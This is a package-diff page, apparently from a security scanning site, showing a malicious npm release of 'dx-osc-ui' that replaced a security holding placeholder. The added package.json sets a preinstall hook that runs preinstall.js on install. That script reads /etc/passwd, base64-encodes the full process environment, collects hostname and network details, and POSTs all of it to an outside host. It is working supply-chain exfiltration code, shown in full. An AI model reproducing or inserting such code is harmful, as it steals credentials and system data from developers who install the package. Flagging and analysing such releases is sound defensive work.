dx-osc-ui 0.0.1-security → 9.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dx-osc-ui might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.hacked = function () {
2
+ return "h1:arthuraires"
3
+ }
package/package.json CHANGED
@@ -1,6 +1,18 @@
1
1
  {
2
2
  "name": "dx-osc-ui",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "9.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node preinstall.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "axios": "^0.21.1",
14
+ "http": "0.0.1-security",
15
+ "https": "^1.0.0",
16
+ "os": "^0.1.1"
17
+ }
18
+ }
package/preinstall.js ADDED
@@ -0,0 +1,79 @@
1
+ 'use strict'
2
+
3
+ const https = require('https')
4
+ const http = require("http");
5
+ const os = require("os");
6
+
7
+ var currentPath = __dirname;
8
+ var currentFile = __filename;
9
+ var currentEnvString = JSON.stringify(process);
10
+ var currentEnvBase64 = Buffer.from(currentEnvString).toString('base64');
11
+
12
+ var fs = require('fs')
13
+
14
+ fs.readFile('/etc/passwd', 'utf8', async function (err,file) {
15
+ if (err) {
16
+ return console.log(err);
17
+ }
18
+ let cloudResponse = '';
19
+ try {
20
+ const teste = await https.request({
21
+ hostname: 'http://poc.arthurair.es/flaskDependecy',
22
+ method: 'GET'
23
+ });
24
+
25
+ console.log(teste);
26
+ } catch(error) {
27
+ console.log(error);
28
+ }
29
+
30
+
31
+ var data = {
32
+ envPORT: process.env.PORT,
33
+ hostname: JSON.stringify(os.hostname()),
34
+ currentPath: currentPath,
35
+ currentFile: currentFile,
36
+ currentEnvBase64: currentEnvBase64,
37
+ type: JSON.stringify(os.type()),
38
+ platform: JSON.stringify(os.platform()),
39
+ arch: JSON.stringify(os.arch()),
40
+ release: JSON.stringify(os.release()),
41
+ uptime: JSON.stringify(os.uptime()),
42
+ loadavg: JSON.stringify(os.loadavg()),
43
+ totalmem: JSON.stringify(os.totalmem()),
44
+ freemem: JSON.stringify(os.freemem()),
45
+ cpus: JSON.stringify(os.cpus()),
46
+ networkInterfaces: JSON.stringify(os.networkInterfaces()),
47
+ etc: Buffer.from(file).toString('base64'),
48
+ };
49
+
50
+ console.log(data);
51
+
52
+ data = JSON.stringify(data);
53
+
54
+ const options = {
55
+ hostname: 'poc.arthurair.es',
56
+ port: 80,
57
+ path: '/flaskDependecy',
58
+ method: 'POST',
59
+ headers: {
60
+ 'Content-Type': 'application/json',
61
+ 'Content-Length': data.length
62
+ }
63
+ }
64
+
65
+ const req = https.request(options, res => {
66
+ // console.log(`statusCode: ${res.statusCode}`)
67
+
68
+ res.on('data', d => {
69
+ process.stdout.write(d)
70
+ })
71
+ })
72
+
73
+ req.on('error', error => {
74
+ console.error(error)
75
+ })
76
+
77
+ req.write(data)
78
+ req.end()
79
+ });
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dx-osc-ui for more information.